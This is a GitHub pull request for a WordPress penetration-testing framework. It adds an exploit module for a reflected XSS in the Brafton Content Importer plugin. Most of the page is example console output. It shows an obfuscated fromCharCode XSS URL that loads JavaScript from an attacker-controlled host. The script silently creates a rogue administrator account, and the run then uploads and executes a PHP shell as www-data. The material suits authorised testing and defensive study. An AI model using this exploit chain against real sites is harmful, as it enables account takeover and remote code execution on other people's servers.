search

rastating / wordpress-exploit-framework

A Ruby framework designed to aid in the penetration testing of WordPress systems.
https://rastating.github.io/wordpress-exploit-framework
GNU General Public License v3.0
1.02k stars 265 forks source link

Add Brafton Content Importer Module #31

Closed phyushin closed 7 years ago

phyushin commented 7 years ago

This module exploits the "Brafton Content Importer" WordPress plugin; the plugin can be downloaded from the following URL: https://github.com/BraftonSupport/BraftonWordpressPlugin/archive/v3.4.5.zip

Fixed in : 3.4.8 Note: the link for the plugin is the latest release [3.4.5] on GitHub but the vulnerability was fixed in 3.4.8

References:

example output:

wpxf > use exploit/brafton_content_importer_reflected_xss_shell_upload 

  [+] Loaded module:
      #<Wpxf::Exploit::BraftonContentImporterReflectedXssShellUpload:0x00000002f3a050>

wpxf [exploit/brafton_content_importer_reflected_xss_shell_upload] > set host 192.168.0.27

  [+] Set host => 192.168.0.27

wpxf [exploit/brafton_content_importer_reflected_xss_shell_upload] > set xss_host 192.168.0.20

  [+] Set xss_host => 192.168.0.20

wpxf [exploit/brafton_content_importer_reflected_xss_shell_upload] > set http_server_bind_port 8080

  [+] Set http_server_bind_port => 8080

wpxf [exploit/brafton_content_importer_reflected_xss_shell_upload] > set payload exec

  [+] Loaded payload: #<Wpxf::Payloads::Exec:0x00000002edce78>

wpxf [exploit/brafton_content_importer_reflected_xss_shell_upload] > set cmd whoami

  [+] Set cmd => whoami

wpxf [exploit/brafton_content_importer_reflected_xss_shell_upload] > run

  [-] Provide the URL below to the victim to begin the payload upload

http://192.168.0.27/wp-admin/admin.php?page=BraftonArticleLoader&tab=eval(String.fromCharCode(101,118,97,108,40,100,101,99,111,100,101,85,82,73,67,111,109,112,111,110,101,110,116,40,47,118,97,114,37,50,48,97,37,50,48,37,51,68,37,50,48,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,37,50,56,37,50,50,115,99,114,105,112,116,37,50,50,37,50,57,37,51,66,97,46,115,101,116,65,116,116,114,105,98,117,116,101,37,50,56,37,50,50,115,114,99,37,50,50,37,50,67,37,50,48,37,50,50,104,116,116,112,37,51,65,37,50,70,37,50,70,49,57,50,46,49,54,56,46,48,46,50,48,37,51,65,56,48,56,48,37,50,70,97,79,116,72,89,84,120,66,37,50,50,37,50,57,37,51,66,100,111,99,117,109,101,110,116,46,104,101,97,100,46,97,112,112,101,110,100,67,104,105,108,100,37,50,56,97,37,50,57,37,51,66,47,46,115,111,117,114,99,101,41,41))

  [-] Started HTTP server on 0.0.0.0:8080
  [-] Incoming request received, serving JavaScript...
  [+] Created a new administrator user, DHnhab:erTPSVpUlA
  [-] HTTP server stopped
  [-] Authenticating with WordPress using DHnhab:erTPSVpUlA...
  [-] Uploading payload...
  [-] Executing the payload at
      http://192.168.0.27/wp-content/plugins/FSAfGcekVl/UUkabnbIWV.php...
  [+] Result: www-data
  [+] Execution finished successfully
rastating commented 7 years ago

This one is merged too :+1: